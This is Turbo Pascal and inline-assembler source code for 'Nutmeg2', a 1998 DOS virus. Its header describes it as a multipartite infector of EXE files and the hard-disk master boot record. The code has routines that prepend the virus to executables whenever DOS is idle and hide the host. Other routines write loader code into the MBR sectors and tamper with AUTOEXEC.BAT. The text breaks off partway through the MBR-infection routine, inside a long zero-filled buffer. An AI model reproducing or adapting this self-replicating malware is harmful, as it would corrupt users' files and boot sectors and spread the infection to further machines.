{ [Nutmeg2] Turbo Pascal Multipartite EXE/MBR infector Copyright 1998 (c) Vecna This is the first know virus written in HLL that infect the MBR also. It infect the owner of the envirment in each interupt 0x28 call, that is called when DOS is idle. The virus place itself in the start of the infected file, adding 4096 bytes to it. It is a prepender that reexecute the host, but with the original name, so, if the host program goes memory resident, MEM.EXE dont show a foreign program as resident. It also have the so called "host stealth", infecting all files, including these with self-checks. Two external assembler routines are used to give the virus the multipartite ability. The virus is packed with LZEXE, and replicate in this form. Two big ugly buffers are used as a temporary storage area when copying and working in the MBR. As the file is packed, altought using big memory spaces, they dont increase the file lenght. } {$F+} {$S-} {$M 8192,0,0} PROGRAM NUTMEG; USES DOS; CONST VIRSIZE=4096; TYPE BUFFER=ARRAY[0..VIRSIZE - 1] OF CHAR; VAR HANDLE:WORD; ENVSEG:WORD; ENVOFF:WORD; PSPSEG:WORD; FILENAME:STRING[128]; MYNAME:STRING[128]; OLDNAME:STRING[128]; MYPARAMS:STRING[128]; VIRBUFFER:BUFFER; AEXEC:BOOLEAN; PROCEDURE GETSEGMENTS; ASSEMBLER; ASM MOV AH, 51H INT 21H MOV ES, BX MOV ES, ES:[2CH] MOV ENVSEG, ES MOV PSPSEG, BX END; PROCEDURE FSEEK(POINTER:WORD); ASSEMBLER; ASM MOV AX, 4200H MOV BX, HANDLE XOR CX, CX MOV DX, POINTER INT 21H END; PROCEDURE READFILE(VAR FILEBUF:BUFFER; READNUM:WORD); ASSEMBLER; ASM PUSH DS MOV AH, 3FH MOV BX, HANDLE MOV CX, READNUM LDS DX, FILEBUF INT 21H POP DS END; PROCEDURE WRITEFILE(FILEBUF:BUFFER; WRITENUM:WORD); ASSEMBLER; ASM PUSH DS MOV AH, 40H MOV BX, HANDLE MOV CX, WRITENUM LDS DX, FILEBUF INT 21H POP DS END; PROCEDURE OPENFILE(FILENAME:STRING; ACCESS:BYTE); ASSEMBLER; ASM PUSH DS MOV AH, 3DH MOV AL, ACCESS LDS DX, FILENAME INC DX INT 21H MOV HANDLE, AX POP DS END; PROCEDURE ERASEFILE(FILENAME:STRING); ASSEMBLER; ASM PUSH DS MOV AH, 41H LDS DX, FILENAME INC DX INT 21H POP DS END; PROCEDURE CLOSEFILE; ASSEMBLER; ASM MOV AH, 3EH MOV BX, HANDLE INT 21H END; PROCEDURE CREATENEWFILE(FILENAME:STRING; ATTRIBUTES:WORD); ASSEMBLER; ASM PUSH DS MOV AH, 3CH MOV CX, ATTRIBUTES LDS DX, FILENAME INC DX INT 21H MOV HANDLE, AX POP DS END; PROCEDURE RENAMEFILE(SOURCE:STRING;DESTINATION:STRING); ASSEMBLER; ASM PUSH DS MOV AH, 56H LDS DX, SOURCE INC DX LES DI, DESTINATION INC DI INT 21H POP DS END; PROCEDURE COPYTO(DESTINATION:STRING; SOURCE:STRING; STARTAT:WORD); ASSEMBLER; VAR HANDLE1,HANDLE2:WORD; ASM PUSH DS MOV AX,3D00H LDS DX,SOURCE INC DX INT 21H MOV HANDLE1, AX MOV AX,3D02H LDS DX,DESTINATION INC DX INT 21H MOV HANDLE2, AX MOV AX, 4200H MOV BX, HANDLE1 XOR CX, CX MOV DX, STARTAT INT 21H MOV AX, 4202H MOV BX, HANDLE2 XOR CX, CX CWD INT 21H PUSH CS POP DS MOV DX, OFFSET @BUFFER @NEXTCHUNK: MOV AH, 3FH MOV BX, HANDLE1 MOV CX, 16*64*4 INT 21H MOV CX, AX MOV AH, 40H MOV BX, HANDLE2 INT 21H CMP AX, 16*64*4 JE @NEXTCHUNK MOV AH, 3EH MOV BX, HANDLE1 INT 21H MOV AH, 3EH MOV BX, HANDLE2 INT 21H JMP @EXIT @BUFFER: DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 @EXIT: POP DS END; FUNCTION RANDOMNAME: STRING; FUNCTION POELETRA(QTAS:CHAR): STRING; VAR CH:CHAR; TEMP:STRING[12]; BEGIN TEMP:=''; REPEAT CH:=CHR(65+RANDOM(25)); TEMP:=TEMP+CH; UNTIL TEMP[0]=QTAS; POELETRA:=TEMP; END; BEGIN RANDOMNAME:=POELETRA(#8)+'.'+POELETRA(#3)+#0; END; PROCEDURE PSPOWNER; BEGIN ENVOFF:=0; FILENAME:=''; GETSEGMENTS; REPEAT ENVOFF:=ENVOFF+1; UNTIL MEMW[ENVSEG:ENVOFF]=$00; ENVOFF:=ENVOFF+4; REPEAT FILENAME:=FILENAME+CHR(MEM[ENVSEG:ENVOFF]); ENVOFF:=ENVOFF+1; UNTIL MEM[ENVSEG:ENVOFF-1]=$00; END; PROCEDURE VIRUSINT28; INTERRUPT; PROCEDURE INFECTEXE; VAR NEWNAME:STRING[128]; WHERESLASH:WORD; OK:BYTE; BEGIN OK:=0; ASM PUSH DS MOV AX, SEG FILENAME MOV DS, AX MOV SI, OFFSET FILENAME MOV DX, SI INC DX MOV AX, 4300H INT 21H JC @TERMINATED CMP CX, 1 JE @TERMINATED XOR CX, CX @SEARCHSLASH: INC SI INC CX CMP BYTE PTR DS:[SI], 0 JE @TERMINATED CMP BYTE PTR DS:[SI], '\' JNE @SEARCHSLASH MOV WHERESLASH, CX MOV OK, 1 JMP @SEARCHSLASH @TERMINATED: POP DS END; IF OK=1 THEN BEGIN NEWNAME:=COPY(FILENAME,1,WHERESLASH)+RANDOMNAME; RENAMEFILE(FILENAME,NEWNAME); CREATENEWFILE(FILENAME,0); WRITEFILE(VIRBUFFER,VIRSIZE); CLOSEFILE; COPYTO(FILENAME,NEWNAME,0); ERASEFILE(NEWNAME); END; ASM PUSH DS MOV AX, SEG FILENAME MOV DS, AX MOV DX, OFFSET FILENAME INC DX MOV AX, 4301H MOV CX, 1 INT 21H POP DS END; END; BEGIN PSPOWNER; IF NOT(OLDNAME=FILENAME) THEN BEGIN IF (FILENAME[LENGTH(FILENAME)-1]='E') THEN INFECTEXE; OLDNAME:=FILENAME; END; END; PROCEDURE INITALL; VAR COUNT:BYTE; BEGIN AEXEC:=TRUE; RANDOMIZE; PSPOWNER; MYNAME:=FILENAME; OPENFILE(MYNAME,0); READFILE(VIRBUFFER,VIRSIZE); CLOSEFILE; IF PARAMSTR(1)='!' THEN BEGIN ASM PUSH DS PUSH CS POP DS CALL @GETNAME DB 'AUTOEXEC.BAT', 0 @GETNAME: POP DX MOV AX, 3D02H INT 21H JC @ECA XCHG AX, BX MOV AX, 4202H MOV CX, -1 MOV DX, -19 INT 21H MOV AH, 40H XOR CX, CX INT 21H MOV AH, 3EH INT 21H MOV AX, SEG MYNAME MOV DS, AX MOV DX, OFFSET MYNAME INC DX MOV AX, 4301H XOR CX, CX INT 21H JC @ECA MOV AH, 41H INT 21H @ECA: POP DS END; AEXEC:=FALSE; END; FOR COUNT:=1 TO PARAMCOUNT DO MYPARAMS:=MYPARAMS+PARAMSTR(COUNT)+' '; END; PROCEDURE SPAWNHOST; VAR NEWNAME:STRING[128]; INF, OUTF:FILE; ATTR:WORD; BEGIN IF AEXEC=TRUE THEN BEGIN ASM PUSH DS MOV AX, SEG MYNAME MOV DS, AX MOV DX, OFFSET MYNAME INC DX MOV AX, 4300H INT 21H MOV ATTR, CX MOV AX, 4301H XOR CX, CX INT 21H POP DS END; NEWNAME:=RANDOMNAME; RENAMEFILE(MYNAME,NEWNAME); CREATENEWFILE(MYNAME,2); CLOSEFILE; COPYTO(MYNAME,NEWNAME,VIRSIZE); SWAPVECTORS; EXEC(MYNAME, MYPARAMS); SWAPVECTORS; ERASEFILE(MYNAME); RENAMEFILE(NEWNAME,MYNAME); ASM PUSH DS MOV AX, SEG MYNAME MOV DS, AX MOV DX, OFFSET MYNAME INC DX MOV AX, 4301H MOV CX, ATTR INT 21H MOV AX, SEG NEWNAME MOV DS, AX MOV DX, OFFSET NEWNAME INC DX MOV AX, 4301H XOR CX, CX INT 21H MOV AH, 41H INT 21H POP DS END; END; END; FUNCTION RESIDENT:BOOLEAN; VAR IVT:LONGINT; BEGIN IVT:=MEML[$0:$350]; IF IVT=$20FF20FF THEN RESIDENT:=TRUE ELSE RESIDENT:=FALSE; END; PROCEDURE MLOADER; EXTERNAL; {$L MLOADER.OBJ} PROCEDURE LOADER; EXTERNAL; {$L LOADER.OBJ} PROCEDURE INFECTMBR; BEGIN ASM PUSH DS PUSH CS POP ES PUSH CS POP DS MOV AH, 08H MOV DX, 0080H INT 13H AND CX, 00111111B CMP CL, ((VIRSIZE+511)/512)+6 JB @OVERBUFFER MOV AX, 0201H MOV CX, 0001H MOV BX, OFFSET @BUFFER MOV DX, 0080H INT 13H JC @OVERBUFFER MOV DI, BX MOV SI, OFFSET MLOADER MOV AX, WORD PTR [SI] CMP WORD PTR [DI], AX JE @OVERBUFFER MOV AX, 0301H MOV CX, 0002H INT 13H JC @OVERBUFFER MOV CX, OFFSET LOADER SUB CX, OFFSET MLOADER CLD REP MOVSB MOV AX, 0301H MOV CX, 0001H MOV DX, 0080H INT 13H JC @OVERBUFFER MOV AX, 0302H MOV CX, 0003H MOV BX, OFFSET LOADER MOV DX, 0080H INT 13H JC @OVERBUFFER MOV BX, OFFSET VIRBUFFER MOV AX, SEG VIRBUFFER MOV ES, AX MOV AX, 300H+((VIRSIZE+511)/512) MOV CX, 0005H INT 13H JMP @OVERBUFFER @BUFFER: DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 DB 00, 00, 00, 00, 00, 00, 